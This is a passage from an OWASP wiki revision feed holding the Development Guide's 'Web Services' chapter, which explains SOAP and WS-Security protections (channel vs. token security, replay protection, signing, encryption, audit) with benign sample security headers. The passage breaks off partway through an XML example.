&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59464</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59464"/>
				<updated>2009-04-26T11:36:55Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Standards committees */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  ''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/dsig:KeyInfo&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:CipherData&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  	&amp;lt;/xenc:ReferenceList&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
